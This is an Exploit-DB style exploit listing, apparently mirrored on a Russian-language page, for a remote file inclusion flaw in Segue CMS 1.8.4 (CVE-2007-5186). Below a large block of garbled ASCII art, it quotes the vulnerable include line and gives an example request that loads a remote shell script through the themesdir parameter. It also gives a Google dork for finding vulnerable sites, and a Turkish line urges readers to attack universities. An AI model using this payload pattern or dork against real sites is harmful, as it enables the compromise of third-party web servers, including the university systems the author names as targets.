Exploit Segue CMS 1.8.4 - 'index.php' Remote File Inclusion

[Exploiter]

EDB-ID

4476

Проверка EDB

1. Пройдено

Автор

KEZZAP66345

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2007-5186

Дата публикации

2007-10-01

?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
_ __________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_____ ____????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??????????_____??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________

# Segue 1.8.4 Middlebury College <=  Remote File Inclusion Vulnerability
#
#Dork:http://www.google.com.tr/search?q=%22Segue+v.%22%2B%22Middlebury+College%22&hl=tr&start=0&sa=N
#
#Vuln Code
##############################################################################################
#
#ERROR1:index.php
#
# include("$themesdir/$theme/output.inc.php"); <<< RFI
#
#
#BUG1:index.php?themesdir
#
#Example1:http://site.com/path/index.php?themesdir=[[Sh3LLScript]]
#
##############################################################################################

##############################################################################################
#download:
#
#http://mesh.dl.sourceforge.net/sourceforge/segue/segue-1.8.4.zip
#
##############################################################################################
#
#>>>>>>>>>>>>>>>> coded by K3ZZAP66345<<<<<<<<<<<<<
#
#"Arkadaslar universitelere saldıralım birazcık  ;)"
#
#
#####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..##############################
##############################################################################################

# milw0rm.com [2007-10-01]